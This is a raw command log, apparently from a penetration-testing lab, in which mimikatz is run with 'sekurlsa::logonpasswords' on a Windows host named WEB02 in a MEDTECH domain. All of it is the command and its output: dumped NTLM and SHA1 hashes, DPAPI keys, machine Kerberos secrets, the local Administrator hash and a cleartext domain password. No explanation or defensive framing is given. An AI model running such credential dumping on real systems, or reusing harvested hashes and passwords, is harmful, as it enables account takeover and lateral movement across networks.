.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 2502608 (00000000:00262fd0)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 4/28/2025 9:13:55 AM
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username : WEB02$
         * Domain   : MEDTECH
         * NTLM     : acc989992f20738afed3da0e3aa2837e
         * SHA1     : 5cc1d02adad7d7237ae1cf133a0b8aa2d98f6276
        tspkg :
        wdigest :
         * Username : WEB02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : WEB02$
         * Domain   : medtech.com
         * Password : da 4b d6 9d 82 2f 10 01 29 8c 6f 2e 02 f5 9f b4 8b 25 9d b0 81 c3 4a 45 2b bc 50 a1 1e ef 7b 88 3e 78 df 54 23 87 46 64 ed eb d5 75 f6 33 1a a9 b6 4f 2f e3 19 1f 4b d0 87 e1 ab bb 86 02 cc f1 ac 5f 31 d7 16 50 39 dd 9f bc 7d 6e f7 91 eb 06 1f fe a8 4a 27 7a 11 6c f7 0d 03 83 2e ac 57 b8 0c a4 fc 9a d0 3c 71 b0 b7 84 a1 2d 7c 1e 8d 92 4a 71 ae 09 10 d7 69 2b c2 19 0a 45 0a 10 a4 1a d3 48 d7 ce 18 46 bb 09 ed 54 1e 65 1a fe c3 cc 86 86 e7 3c 38 64 64 67 fc d1 42 68 ac 7c 32 f7 be cc 06 45 40 5b 54 cd e2 51 e8 d2 c8 68 9f f9 b7 e3 b5 d9 36 8e e4 ed 72 94 38 b9 4d ee 2a 1d 0d 0c 7a c0 55 e2 c0 7b 18 aa 3f 25 53 17 b5 6b 3b c8 d9 e1 a6 3b 06 a9 8c 09 41 ec 33 22 5d 91 a7 d8 86 e7 21 62 12 fc 7b a5 6a 57 c8 8e 7f 43
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 672210 (00000000:000a41d2)
Session           : Service from 0
User Name         : MSSQL$MICROSOFT##WID
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 7/23/2024 10:43:58 PM
SID               : S-1-5-80-1184457765-4068085190-3456807688-2200952327-3769537534
        msv :
         [00000003] Primary
         * Username : WEB02$
         * Domain   : MEDTECH
         * NTLM     : acc989992f20738afed3da0e3aa2837e
         * SHA1     : 5cc1d02adad7d7237ae1cf133a0b8aa2d98f6276
        tspkg :
        wdigest :
         * Username : WEB02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : WEB02$
         * Domain   : medtech.com
         * Password : da 4b d6 9d 82 2f 10 01 29 8c 6f 2e 02 f5 9f b4 8b 25 9d b0 81 c3 4a 45 2b bc 50 a1 1e ef 7b 88 3e 78 df 54 23 87 46 64 ed eb d5 75 f6 33 1a a9 b6 4f 2f e3 19 1f 4b d0 87 e1 ab bb 86 02 cc f1 ac 5f 31 d7 16 50 39 dd 9f bc 7d 6e f7 91 eb 06 1f fe a8 4a 27 7a 11 6c f7 0d 03 83 2e ac 57 b8 0c a4 fc 9a d0 3c 71 b0 b7 84 a1 2d 7c 1e 8d 92 4a 71 ae 09 10 d7 69 2b c2 19 0a 45 0a 10 a4 1a d3 48 d7 ce 18 46 bb 09 ed 54 1e 65 1a fe c3 cc 86 86 e7 3c 38 64 64 67 fc d1 42 68 ac 7c 32 f7 be cc 06 45 40 5b 54 cd e2 51 e8 d2 c8 68 9f f9 b7 e3 b5 d9 36 8e e4 ed 72 94 38 b9 4d ee 2a 1d 0d 0c 7a c0 55 e2 c0 7b 18 aa 3f 25 53 17 b5 6b 3b c8 d9 e1 a6 3b 06 a9 8c 09 41 ec 33 22 5d 91 a7 d8 86 e7 21 62 12 fc 7b a5 6a 57 c8 8e 7f 43
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 342158 (00000000:0005388e)
Session           : Interactive from 1
User Name         : joe
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 7/23/2024 10:42:00 PM
SID               : S-1-5-21-976142013-3766213998-138799841-1106
        msv :
         [00000003] Primary
         * Username : joe
         * Domain   : MEDTECH
         * NTLM     : 08d7a47a6f9f66b97b1bae4178747494
         * SHA1     : a0c2285bfad20cc614e2d361d6246579843557cd
         * DPAPI    : 58de53296298ce0f98087ae902c88735
        tspkg :
        wdigest :
         * Username : joe
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : joe
         * Domain   : MEDTECH.COM
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 291706 (00000000:0004737a)
Session           : Service from 0
User Name         : joe
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 7/23/2024 10:41:56 PM
SID               : S-1-5-21-976142013-3766213998-138799841-1106
        msv :
         [00000003] Primary
         * Username : joe
         * Domain   : MEDTECH
         * NTLM     : 08d7a47a6f9f66b97b1bae4178747494
         * SHA1     : a0c2285bfad20cc614e2d361d6246579843557cd
         * DPAPI    : 58de53296298ce0f98087ae902c88735
        tspkg :
        wdigest :
         * Username : joe
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : joe
         * Domain   : MEDTECH.COM
         * Password : Flowers1
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 291702 (00000000:00047376)
Session           : Service from 0
User Name         : joe
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 7/23/2024 10:41:56 PM
SID               : S-1-5-21-976142013-3766213998-138799841-1106
        msv :
         [00000003] Primary
         * Username : joe
         * Domain   : MEDTECH
         * NTLM     : 08d7a47a6f9f66b97b1bae4178747494
         * SHA1     : a0c2285bfad20cc614e2d361d6246579843557cd
         * DPAPI    : 58de53296298ce0f98087ae902c88735
        tspkg :
        wdigest :
         * Username : joe
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : joe
         * Domain   : MEDTECH.COM
         * Password : Flowers1
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 120992 (00000000:0001d8a0)
Session           : Service from 0
User Name         : MSSQL$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:44 PM
SID               : S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133
        msv :
         [00000003] Primary
         * Username : WEB02$
         * Domain   : MEDTECH
         * NTLM     : acc989992f20738afed3da0e3aa2837e
         * SHA1     : 5cc1d02adad7d7237ae1cf133a0b8aa2d98f6276
        tspkg :
        wdigest :
         * Username : WEB02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : WEB02$
         * Domain   : medtech.com
         * Password : da 4b d6 9d 82 2f 10 01 29 8c 6f 2e 02 f5 9f b4 8b 25 9d b0 81 c3 4a 45 2b bc 50 a1 1e ef 7b 88 3e 78 df 54 23 87 46 64 ed eb d5 75 f6 33 1a a9 b6 4f 2f e3 19 1f 4b d0 87 e1 ab bb 86 02 cc f1 ac 5f 31 d7 16 50 39 dd 9f bc 7d 6e f7 91 eb 06 1f fe a8 4a 27 7a 11 6c f7 0d 03 83 2e ac 57 b8 0c a4 fc 9a d0 3c 71 b0 b7 84 a1 2d 7c 1e 8d 92 4a 71 ae 09 10 d7 69 2b c2 19 0a 45 0a 10 a4 1a d3 48 d7 ce 18 46 bb 09 ed 54 1e 65 1a fe c3 cc 86 86 e7 3c 38 64 64 67 fc d1 42 68 ac 7c 32 f7 be cc 06 45 40 5b 54 cd e2 51 e8 d2 c8 68 9f f9 b7 e3 b5 d9 36 8e e4 ed 72 94 38 b9 4d ee 2a 1d 0d 0c 7a c0 55 e2 c0 7b 18 aa 3f 25 53 17 b5 6b 3b c8 d9 e1 a6 3b 06 a9 8c 09 41 ec 33 22 5d 91 a7 d8 86 e7 21 62 12 fc 7b a5 6a 57 c8 8e 7f 43
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WEB02$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:43 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WEB02$
         * Domain   : MEDTECH
         * NTLM     : acc989992f20738afed3da0e3aa2837e
         * SHA1     : 5cc1d02adad7d7237ae1cf133a0b8aa2d98f6276
        tspkg :
        wdigest :
         * Username : WEB02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : web02$
         * Domain   : MEDTECH.COM
         * Password : da 4b d6 9d 82 2f 10 01 29 8c 6f 2e 02 f5 9f b4 8b 25 9d b0 81 c3 4a 45 2b bc 50 a1 1e ef 7b 88 3e 78 df 54 23 87 46 64 ed eb d5 75 f6 33 1a a9 b6 4f 2f e3 19 1f 4b d0 87 e1 ab bb 86 02 cc f1 ac 5f 31 d7 16 50 39 dd 9f bc 7d 6e f7 91 eb 06 1f fe a8 4a 27 7a 11 6c f7 0d 03 83 2e ac 57 b8 0c a4 fc 9a d0 3c 71 b0 b7 84 a1 2d 7c 1e 8d 92 4a 71 ae 09 10 d7 69 2b c2 19 0a 45 0a 10 a4 1a d3 48 d7 ce 18 46 bb 09 ed 54 1e 65 1a fe c3 cc 86 86 e7 3c 38 64 64 67 fc d1 42 68 ac 7c 32 f7 be cc 06 45 40 5b 54 cd e2 51 e8 d2 c8 68 9f f9 b7 e3 b5 d9 36 8e e4 ed 72 94 38 b9 4d ee 2a 1d 0d 0c 7a c0 55 e2 c0 7b 18 aa 3f 25 53 17 b5 6b 3b c8 d9 e1 a6 3b 06 a9 8c 09 41 ec 33 22 5d 91 a7 d8 86 e7 21 62 12 fc 7b a5 6a 57 c8 8e 7f 43
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 47729 (00000000:0000ba71)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:43 PM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : WEB02$
         * Domain   : MEDTECH
         * NTLM     : acc989992f20738afed3da0e3aa2837e
         * SHA1     : 5cc1d02adad7d7237ae1cf133a0b8aa2d98f6276
        tspkg :
        wdigest :
         * Username : WEB02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : WEB02$
         * Domain   : medtech.com
         * Password : da 4b d6 9d 82 2f 10 01 29 8c 6f 2e 02 f5 9f b4 8b 25 9d b0 81 c3 4a 45 2b bc 50 a1 1e ef 7b 88 3e 78 df 54 23 87 46 64 ed eb d5 75 f6 33 1a a9 b6 4f 2f e3 19 1f 4b d0 87 e1 ab bb 86 02 cc f1 ac 5f 31 d7 16 50 39 dd 9f bc 7d 6e f7 91 eb 06 1f fe a8 4a 27 7a 11 6c f7 0d 03 83 2e ac 57 b8 0c a4 fc 9a d0 3c 71 b0 b7 84 a1 2d 7c 1e 8d 92 4a 71 ae 09 10 d7 69 2b c2 19 0a 45 0a 10 a4 1a d3 48 d7 ce 18 46 bb 09 ed 54 1e 65 1a fe c3 cc 86 86 e7 3c 38 64 64 67 fc d1 42 68 ac 7c 32 f7 be cc 06 45 40 5b 54 cd e2 51 e8 d2 c8 68 9f f9 b7 e3 b5 d9 36 8e e4 ed 72 94 38 b9 4d ee 2a 1d 0d 0c 7a c0 55 e2 c0 7b 18 aa 3f 25 53 17 b5 6b 3b c8 d9 e1 a6 3b 06 a9 8c 09 41 ec 33 22 5d 91 a7 d8 86 e7 21 62 12 fc 7b a5 6a 57 c8 8e 7f 43
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 713358 (00000000:000ae28e)
Session           : Batch from 0
User Name         : Administrator
Domain            : WEB02
Logon Server      : WEB02
Logon Time        : 7/23/2024 10:44:00 PM
SID               : S-1-5-21-1364059446-3280107051-2039649012-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : WEB02
         * NTLM     : b2c03054c306ac8fc5f9d188710b0168
         * SHA1     : 14260fbb8c532d874a11696bcb3ee176120c0875
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : WEB02
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : WEB02
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:45 PM
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 122206 (00000000:0001dd5e)
Session           : Service from 0
User Name         : SQLTELEMETRY$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:44 PM
SID               : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
        msv :
         [00000003] Primary
         * Username : WEB02$
         * Domain   : MEDTECH
         * NTLM     : acc989992f20738afed3da0e3aa2837e
         * SHA1     : 5cc1d02adad7d7237ae1cf133a0b8aa2d98f6276
        tspkg :
        wdigest :
         * Username : WEB02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : WEB02$
         * Domain   : medtech.com
         * Password : da 4b d6 9d 82 2f 10 01 29 8c 6f 2e 02 f5 9f b4 8b 25 9d b0 81 c3 4a 45 2b bc 50 a1 1e ef 7b 88 3e 78 df 54 23 87 46 64 ed eb d5 75 f6 33 1a a9 b6 4f 2f e3 19 1f 4b d0 87 e1 ab bb 86 02 cc f1 ac 5f 31 d7 16 50 39 dd 9f bc 7d 6e f7 91 eb 06 1f fe a8 4a 27 7a 11 6c f7 0d 03 83 2e ac 57 b8 0c a4 fc 9a d0 3c 71 b0 b7 84 a1 2d 7c 1e 8d 92 4a 71 ae 09 10 d7 69 2b c2 19 0a 45 0a 10 a4 1a d3 48 d7 ce 18 46 bb 09 ed 54 1e 65 1a fe c3 cc 86 86 e7 3c 38 64 64 67 fc d1 42 68 ac 7c 32 f7 be cc 06 45 40 5b 54 cd e2 51 e8 d2 c8 68 9f f9 b7 e3 b5 d9 36 8e e4 ed 72 94 38 b9 4d ee 2a 1d 0d 0c 7a c0 55 e2 c0 7b 18 aa 3f 25 53 17 b5 6b 3b c8 d9 e1 a6 3b 06 a9 8c 09 41 ec 33 22 5d 91 a7 d8 86 e7 21 62 12 fc 7b a5 6a 57 c8 8e 7f 43
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:43 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 78616 (00000000:00013318)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:43 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : WEB02$
         * Domain   : MEDTECH
         * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
         * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
        tspkg :
        wdigest :
         * Username : WEB02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : WEB02$
         * Domain   : medtech.com
         * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 78598 (00000000:00013306)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:43 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : WEB02$
         * Domain   : MEDTECH
         * NTLM     : acc989992f20738afed3da0e3aa2837e
         * SHA1     : 5cc1d02adad7d7237ae1cf133a0b8aa2d98f6276
        tspkg :
        wdigest :
         * Username : WEB02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : WEB02$
         * Domain   : medtech.com
         * Password : da 4b d6 9d 82 2f 10 01 29 8c 6f 2e 02 f5 9f b4 8b 25 9d b0 81 c3 4a 45 2b bc 50 a1 1e ef 7b 88 3e 78 df 54 23 87 46 64 ed eb d5 75 f6 33 1a a9 b6 4f 2f e3 19 1f 4b d0 87 e1 ab bb 86 02 cc f1 ac 5f 31 d7 16 50 39 dd 9f bc 7d 6e f7 91 eb 06 1f fe a8 4a 27 7a 11 6c f7 0d 03 83 2e ac 57 b8 0c a4 fc 9a d0 3c 71 b0 b7 84 a1 2d 7c 1e 8d 92 4a 71 ae 09 10 d7 69 2b c2 19 0a 45 0a 10 a4 1a d3 48 d7 ce 18 46 bb 09 ed 54 1e 65 1a fe c3 cc 86 86 e7 3c 38 64 64 67 fc d1 42 68 ac 7c 32 f7 be cc 06 45 40 5b 54 cd e2 51 e8 d2 c8 68 9f f9 b7 e3 b5 d9 36 8e e4 ed 72 94 38 b9 4d ee 2a 1d 0d 0c 7a c0 55 e2 c0 7b 18 aa 3f 25 53 17 b5 6b 3b c8 d9 e1 a6 3b 06 a9 8c 09 41 ec 33 22 5d 91 a7 d8 86 e7 21 62 12 fc 7b a5 6a 57 c8 8e 7f 43
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 47714 (00000000:0000ba62)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:43 PM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : WEB02$
         * Domain   : MEDTECH
         * NTLM     : acc989992f20738afed3da0e3aa2837e
         * SHA1     : 5cc1d02adad7d7237ae1cf133a0b8aa2d98f6276
        tspkg :
        wdigest :
         * Username : WEB02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : WEB02$
         * Domain   : medtech.com
         * Password : da 4b d6 9d 82 2f 10 01 29 8c 6f 2e 02 f5 9f b4 8b 25 9d b0 81 c3 4a 45 2b bc 50 a1 1e ef 7b 88 3e 78 df 54 23 87 46 64 ed eb d5 75 f6 33 1a a9 b6 4f 2f e3 19 1f 4b d0 87 e1 ab bb 86 02 cc f1 ac 5f 31 d7 16 50 39 dd 9f bc 7d 6e f7 91 eb 06 1f fe a8 4a 27 7a 11 6c f7 0d 03 83 2e ac 57 b8 0c a4 fc 9a d0 3c 71 b0 b7 84 a1 2d 7c 1e 8d 92 4a 71 ae 09 10 d7 69 2b c2 19 0a 45 0a 10 a4 1a d3 48 d7 ce 18 46 bb 09 ed 54 1e 65 1a fe c3 cc 86 86 e7 3c 38 64 64 67 fc d1 42 68 ac 7c 32 f7 be cc 06 45 40 5b 54 cd e2 51 e8 d2 c8 68 9f f9 b7 e3 b5 d9 36 8e e4 ed 72 94 38 b9 4d ee 2a 1d 0d 0c 7a c0 55 e2 c0 7b 18 aa 3f 25 53 17 b5 6b 3b c8 d9 e1 a6 3b 06 a9 8c 09 41 ec 33 22 5d 91 a7 d8 86 e7 21 62 12 fc 7b a5 6a 57 c8 8e 7f 43
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 46451 (00000000:0000b573)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:42 PM
SID               :
        msv :
         [00000003] Primary
         * Username : WEB02$
         * Domain   : MEDTECH
         * NTLM     : acc989992f20738afed3da0e3aa2837e
         * SHA1     : 5cc1d02adad7d7237ae1cf133a0b8aa2d98f6276
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WEB02$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 7/23/2024 10:41:42 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WEB02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : web02$
         * Domain   : MEDTECH.COM
         * Password : da 4b d6 9d 82 2f 10 01 29 8c 6f 2e 02 f5 9f b4 8b 25 9d b0 81 c3 4a 45 2b bc 50 a1 1e ef 7b 88 3e 78 df 54 23 87 46 64 ed eb d5 75 f6 33 1a a9 b6 4f 2f e3 19 1f 4b d0 87 e1 ab bb 86 02 cc f1 ac 5f 31 d7 16 50 39 dd 9f bc 7d 6e f7 91 eb 06 1f fe a8 4a 27 7a 11 6c f7 0d 03 83 2e ac 57 b8 0c a4 fc 9a d0 3c 71 b0 b7 84 a1 2d 7c 1e 8d 92 4a 71 ae 09 10 d7 69 2b c2 19 0a 45 0a 10 a4 1a d3 48 d7 ce 18 46 bb 09 ed 54 1e 65 1a fe c3 cc 86 86 e7 3c 38 64 64 67 fc d1 42 68 ac 7c 32 f7 be cc 06 45 40 5b 54 cd e2 51 e8 d2 c8 68 9f f9 b7 e3 b5 d9 36 8e e4 ed 72 94 38 b9 4d ee 2a 1d 0d 0c 7a c0 55 e2 c0 7b 18 aa 3f 25 53 17 b5 6b 3b c8 d9 e1 a6 3b 06 a9 8c 09 41 ec 33 22 5d 91 a7 d8 86 e7 21 62 12 fc 7b a5 6a 57 c8 8e 7f 43
        ssp :
        credman :
        cloudap :

